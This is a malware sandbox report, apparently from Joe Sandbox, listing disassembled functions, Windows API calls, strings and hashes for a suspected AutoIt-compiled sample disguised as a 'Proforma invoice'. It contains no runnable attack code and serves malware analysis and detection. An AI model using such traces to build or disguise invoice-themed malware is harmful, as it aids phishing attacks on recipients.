                                                                                                                    • _wprintf.LIBCMT ref: 002AFA17
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002AFA2E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                    • API String ID: 984253442-2268648507
                                                                                                                    • Opcode ID: 49e071fe3ec43a27d15fd8ddfa6020c50b0f00235ea4d1d9f844aed13a88764d
                                                                                                                    • Instruction ID: 4e52f00090a6e9e1205cbf2804f6b2bd2b36ec81aadd005c7b084cbfaabae69f
                                                                                                                    • Opcode Fuzzy Hash: 49e071fe3ec43a27d15fd8ddfa6020c50b0f00235ea4d1d9f844aed13a88764d
                                                                                                                    • Instruction Fuzzy Hash: 92415D72851119ABCB05FBE0DE96DEE777CAF14301F100065F905760A2EE356F29CE64
                                                                                                                    Function 002DBA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002D9207,?,?), ref: 002DBA56
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBA6D
                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBA78
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBA85
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 002DBA8E
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBA9D
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 002DBAA6
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBAAD
                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002D9207,?,?,00000000,?), ref: 002DBABE
                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,002E2CAC,?), ref: 002DBAD7
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 002DBAE7
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 002DBB0B
                                                                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 002DBB36
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002DBB5E
                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 002DBB74
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3840717409-0
                                                                                                                    • Opcode ID: 7c5778aeb20d87902e08c08bfddcdd9e17e53128b66026370969da0f463d920f
                                                                                                                    • Instruction ID: 52ae5256623716267d17d4403594a7664119e420874298fba9b6545dfeb6e663
                                                                                                                    • Opcode Fuzzy Hash: 7c5778aeb20d87902e08c08bfddcdd9e17e53128b66026370969da0f463d920f
                                                                                                                    • Instruction Fuzzy Hash: 32416A75A01205EFCB119F65ED8CEAA7BB8FF89711F11806AF90AD7260D7709E01CB60
                                                                                                                    Function 002BD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __wsplitpath.LIBCMT ref: 002BDA10
                                                                                                                    • _wcscat.LIBCMT ref: 002BDA28
                                                                                                                    • _wcscat.LIBCMT ref: 002BDA3A
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002BDA4F
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002BDA63
                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 002BDA7B
                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 002BDA95
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 002BDAA7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                    • String ID: *.*
                                                                                                                    • API String ID: 34673085-438819550
                                                                                                                    • Opcode ID: 1079e4f17675573dcf2f41d34c76bedc23fe94c44d61902d63e76eac0f531140
                                                                                                                    • Instruction ID: 0ea81ae4062b4a1f473f579de04ccc1cecaa2d3df710c9aa37f4fb5ba3753965
                                                                                                                    • Opcode Fuzzy Hash: 1079e4f17675573dcf2f41d34c76bedc23fe94c44d61902d63e76eac0f531140
                                                                                                                    • Instruction Fuzzy Hash: 6481B2725246419FCB24EF64C844AEAB7E4AF89390F18882EF889C7251E730ED55CB52
                                                                                                                    Function 002DC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 002DC1FC
                                                                                                                    • GetFocus.USER32 ref: 002DC20C
                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 002DC217
                                                                                                                    • _memset.LIBCMT ref: 002DC342
                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 002DC36D
                                                                                                                    • GetMenuItemCount.USER32(?), ref: 002DC38D
                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 002DC3A0
                                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 002DC3D4
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 002DC41C
                                                                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002DC454
                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 002DC489
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1296962147-4108050209
                                                                                                                    • Opcode ID: 094ca9139b5883986425072bc4b3c63cc1d5f73bee08c64c3834e27ad2e7113b
                                                                                                                    • Instruction ID: 43b31efb021860eb688b67ac1cf1362ec401e549a6ceddcc0b02d0a036fb236c
                                                                                                                    • Opcode Fuzzy Hash: 094ca9139b5883986425072bc4b3c63cc1d5f73bee08c64c3834e27ad2e7113b
                                                                                                                    • Instruction Fuzzy Hash: 4E819C706283429FD715DF14D894AAABBE8EF88314F20492EF99597391C770DD14CB92
                                                                                                                    Function 002C731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 002C738F
                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 002C739B
                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 002C73A7
                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 002C73B4
                                                                                                                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 002C7408
                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 002C7444
                                                                                                                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 002C7468
                                                                                                                    • SelectObject.GDI32(00000006,?), ref: 002C7470
                                                                                                                    • DeleteObject.GDI32(?), ref: 002C7479
                                                                                                                    • DeleteDC.GDI32(00000006), ref: 002C7480
                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 002C748B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 2598888154-3887548279
                                                                                                                    • Opcode ID: 44eaa1944362b99557f8afd5944dfbc32f2726bdfea76afe1132955e41a2ee1c
                                                                                                                    • Instruction ID: fcfb4fe30a7f447fc2b2304ba47adbf9e3a4b02a0baac77cf52701ce79df014f
                                                                                                                    • Opcode Fuzzy Hash: 44eaa1944362b99557f8afd5944dfbc32f2726bdfea76afe1132955e41a2ee1c
                                                                                                                    • Instruction Fuzzy Hash: 27513771914209EFCB14CFA8DC89EAEBBB9EF48310F14852EF95A97210D771AD508F50
                                                                                                                    Function 00256A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00270957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00256B0C,?,00008000), ref: 00270973
                                                                                                                      • Part of subcall function 00254750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00254743,?,?,002537AE,?), ref: 00254770
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00256BAD
                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00256CFA
                                                                                                                      • Part of subcall function 0025586D: _wcscpy.LIBCMT ref: 002558A5
                                                                                                                      • Part of subcall function 0027363D: _iswctype.LIBCMT ref: 00273645
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                    • API String ID: 537147316-1018226102
                                                                                                                    • Opcode ID: edda6ef4cb17ec19d07f5802dd54043732c0e3ffed46a65fb275614c8528214e
                                                                                                                    • Instruction ID: 306090f915e51927d7fb456ac432286eb6d8bd2a9f1b90f841b22305f38597d5
                                                                                                                    • Opcode Fuzzy Hash: edda6ef4cb17ec19d07f5802dd54043732c0e3ffed46a65fb275614c8528214e
                                                                                                                    • Instruction Fuzzy Hash: AB02BD301293419FCB24EF20C8919AFBBE5EF99315F50481DF88A972A1DB30D969CF56
                                                                                                                    Function 002B2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 002B2D50
                                                                                                                    • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 002B2DDD
                                                                                                                    • GetMenuItemCount.USER32(00315890), ref: 002B2E66
                                                                                                                    • DeleteMenu.USER32(00315890,00000005,00000000,000000F5,?,?), ref: 002B2EF6
                                                                                                                    • DeleteMenu.USER32(00315890,00000004,00000000), ref: 002B2EFE
                                                                                                                    • DeleteMenu.USER32(00315890,00000006,00000000), ref: 002B2F06
                                                                                                                    • DeleteMenu.USER32(00315890,00000003,00000000), ref: 002B2F0E
                                                                                                                    • GetMenuItemCount.USER32(00315890), ref: 002B2F16
                                                                                                                    • SetMenuItemInfoW.USER32(00315890,00000004,00000000,00000030), ref: 002B2F4C
                                                                                                                    • GetCursorPos.USER32(?), ref: 002B2F56
                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 002B2F5F
                                                                                                                    • TrackPopupMenuEx.USER32(00315890,00000000,?,00000000,00000000,00000000), ref: 002B2F72
                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 002B2F7E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3993528054-0
                                                                                                                    • Opcode ID: f85e29ee21ff1adca874e51fcd7bce73ba3890500e461ee36ba2f7ca8a300caa
                                                                                                                    • Instruction ID: d0546146f3861d0da01287365e75e957585e233aa5847e64eb337648785f1a56
                                                                                                                    • Opcode Fuzzy Hash: f85e29ee21ff1adca874e51fcd7bce73ba3890500e461ee36ba2f7ca8a300caa
                                                                                                                    • Instruction Fuzzy Hash: 2E71F470611306FAEB218F15DC49FEABF64FB04394F144216F615AA1E1C7B1AC78CB94
                                                                                                                    Function 002C88AB Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 002C88D7
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 002C8904
                                                                                                                    • CoUninitialize.OLE32 ref: 002C890E
                                                                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 002C8A0E
                                                                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 002C8B3B
                                                                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,002E2C0C), ref: 002C8B6F
                                                                                                                    • CoGetObject.OLE32(?,00000000,002E2C0C,?), ref: 002C8B92
                                                                                                                    • SetErrorMode.KERNEL32(00000000), ref: 002C8BA5
                                                                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 002C8C25
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 002C8C35
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                    • String ID: ,,.
                                                                                                                    • API String ID: 2395222682-737214711
                                                                                                                    • Opcode ID: db4d32a2af06c5a39fc6c4e53765bf0a7dfa118c7b2e92b140c0bd95efa1fc0d
                                                                                                                    • Instruction ID: 41251250b6d8d5a7e9f6330f7788404126957ad4066d822dd7aa0f7bb1e154d2
                                                                                                                    • Opcode Fuzzy Hash: db4d32a2af06c5a39fc6c4e53765bf0a7dfa118c7b2e92b140c0bd95efa1fc0d
                                                                                                                    • Instruction Fuzzy Hash: 83C134B1628305AFD700DF24C884E2AB7E9BF89348F004A5DF98ADB250DB71ED15CB52
                                                                                                                    Function 002A77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                    • _memset.LIBCMT ref: 002A786B
                                                                                                                    • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002A78A0
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002A78BC
                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002A78D8
                                                                                                                    • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 002A7902
                                                                                                                    • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 002A792A
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002A7935
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 002A793A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                    • API String ID: 1411258926-22481851
                                                                                                                    • Opcode ID: d29b0d5910c3946c8bf6814ff91b988e5a12a1d08daf9aa6968e3a464df56a34
                                                                                                                    • Instruction ID: 6855ab2d0cb810a9aac2b689180a88c27dfbed2df64badeb93bc69c5671fce90
                                                                                                                    • Opcode Fuzzy Hash: d29b0d5910c3946c8bf6814ff91b988e5a12a1d08daf9aa6968e3a464df56a34
                                                                                                                    • Instruction Fuzzy Hash: 28410872C25229ABCB11EFA4EC95DEEB778BF04751F00406AE905A31A1DB345E19CF94
                                                                                                                    Function 002D0E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,002CFDAD,?,?), ref: 002D0E31
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpper
                                                                                                                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                    • API String ID: 3964851224-909552448
                                                                                                                    • Opcode ID: 9cb46927843f1164f019fb884d4cfe324427bb7ac2a31f6141d85792e6e9c963
                                                                                                                    • Instruction ID: 54135021ceeabc186ce5227eb38d2f847f5d0fa754caae59f100c7a0f8cf14e5
                                                                                                                    • Opcode Fuzzy Hash: 9cb46927843f1164f019fb884d4cfe324427bb7ac2a31f6141d85792e6e9c963
                                                                                                                    • Instruction Fuzzy Hash: 7C417B7552024A8FCF11EF10E8A6BEF3764AF15700F644416FC951B6A2DB709D2ACBA0
                                                                                                                    Function 002AF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0028E2A0,00000010,?,Bad directive syntax error,002DF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 002AF7C2
                                                                                                                    • LoadStringW.USER32(00000000,?,0028E2A0,00000010), ref: 002AF7C9
                                                                                                                      • Part of subcall function 00257DE1: _memmove.LIBCMT ref: 00257E22
                                                                                                                    • _wprintf.LIBCMT ref: 002AF7FC
                                                                                                                    • __swprintf.LIBCMT ref: 002AF81E
                                                                                                                    • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 002AF88D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                    • API String ID: 1506413516-4153970271
                                                                                                                    • Opcode ID: 8f73bc44b78a612b33f7283f88493932208e9e2d0bd9fdac18330f0691737ff1
                                                                                                                    • Instruction ID: d0b2db9f4904390af95bf754fd5410ca209a2c27da1e9acb37e3c768ada7fa7a
                                                                                                                    • Opcode Fuzzy Hash: 8f73bc44b78a612b33f7283f88493932208e9e2d0bd9fdac18330f0691737ff1
                                                                                                                    • Instruction Fuzzy Hash: FC21913186121EEFCF12EF90DC1AEED7738BF18301F044466F915660A2DA759A28DF54
                                                                                                                    Function 002B52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00257BCC: _memmove.LIBCMT ref: 00257C06
                                                                                                                      • Part of subcall function 00257924: _memmove.LIBCMT ref: 002579AD
                                                                                                                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 002B5330
                                                                                                                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 002B5346
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 002B5357
                                                                                                                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 002B5369
                                                                                                                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 002B537A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
